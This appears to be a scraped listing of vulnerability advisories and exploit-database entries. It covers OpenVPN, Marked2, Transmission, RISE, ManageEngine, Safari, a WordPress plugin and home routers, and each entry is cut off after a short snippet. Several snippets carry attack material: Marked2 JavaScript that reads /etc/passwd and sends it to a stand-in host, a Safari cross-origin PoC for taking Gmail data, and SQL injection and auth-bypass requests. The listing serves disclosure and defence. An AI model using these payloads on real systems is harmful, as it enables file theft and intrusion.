Input validation
DISPUTED A cross-protocol scripting issue was discovered in the management interface in OpenVPN through 2.4.5. When this interface is enabled over TCP without a password, and when no other clients are connected to this interface, attackers can execute arbitrary management commands, obtain sensiti...
CVE-2018-7544
Removed by vendor...
Marked2 - Local File Disclosure Vulnerability
Exploit for multiple platform in category local exploits var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new...
CVE-2018-6824
Cozy version 2 has XSS allowing remote attackers to obtain administrative access via JavaScript code in the url parameter to the /api/proxy URI, as demonstrated by an XMLHttpRequest call with an 'email:"[email protected]"' request, which can be followed by a password reset...
CVE-2018-6806
Marked 2 through 2.5.11 allows remote attackers to read arbitrary files via a crafted HTML document that triggers a redirect to an x-marked://preview?text= URL. The value of the text parameter can include arbitrary JavaScript code, e.g., making XMLHttpRequest calls...
Marked2 - Local File Disclosure
Marked2 - Local File Disclosure var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest;...
Transmission - RPC DNS Rebinding Exploit
Exploit for multiple platform in category remote exploits The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to ...
RISE 1.9 - 'search' SQL Injection
Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection Exploit Author: Ahmad Mahfouz Contact: http://twitter.com/eln1x Date: 30/12/2017 CVE: CVE-2017-17999 Vendor Homepage: http://fairsketch.com/ Version: 1.9 POST /index.php/knowledgebase/getarticlesuggestion/ HTTP/1.1 Host: localhost...
Transmission - RPC DNS Rebinding
Transmission - RPC DNS Rebinding The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to a web server listening on...
Transmission - RPC DNS Rebinding
The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemo...
Samsung Internet Browser SOP Bypass
This module takes advantage of a Same-Origin Policy SOP bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up. Thi...
transmission-daemon -- vulnerable to dns rebinding attacks
Google Project Zero reports: The transmission bittorrent client uses a client/server architecture, the user interface is the client which communicates to the worker daemon using JSON RPC requests. As with all HTTP RPC schemes like this, any website can send requests to the daemon listening on...
ManageEngine Applications Manager 13 - SQL Injection
ManageEngine Applications Manager 13 - SQL Injection ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities. Proof of Concept 1 name= parameter is susceptible: POST /manageApplications.do?method=insert HTTP/1.1 Host: 192.168.1.190:9090...
Zoho ManageEngine Applications Manager 13 SQL Injection
ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities. Proof of Concept 1 name= parameter is susceptible: POST /manageApplications.do?method=insert HTTP/1.1 Host: 192.168.1.190:9090 User-Agent: Mozilla/5.0 Windows NT 10.0; WOW64;...
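Safari 10 cross-origin vulnerability
In Safari 10, XMLHttpRequest under the null origin can freely issue cross-origin requests and set HTTP headers. After I submitted a bug report to Apple and emailed them, they quietly fixed the vulnerability themselves without even sending me an email, so I decided to publish the PoC. This is a screenshot I took before the vulnerability was fixed: This vulnerability allows a same-origin policy bypass and arbitrary cross-origin access. This is the code I wrote to retrieve Gmail data: html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...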
Student Result or Employee Database <= 1.6.3 - Auth Bypass
The Student Result or Employee Database WordPress plugin was affected by an Auth Bypass security vulnerability. curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer:...
Roteador Wireless Intelbras WRN150 - Cross-Site Scripting
Roteador Wireless Intelbras WRN150 - Cross-Site Scripting Exploit Title: XSS persistent on intelbras router with firmware WRN 250 Date: 07/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150Mbps - WRN 240 Tested on: kali linux, windows...
Technicolor TC7337 - SSID Persistent Cross-Site Scripting
Technicolor TC7337 - SSID Persistent Cross-Site Scripting // Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not requires quotes , and passing the URL with ony '//...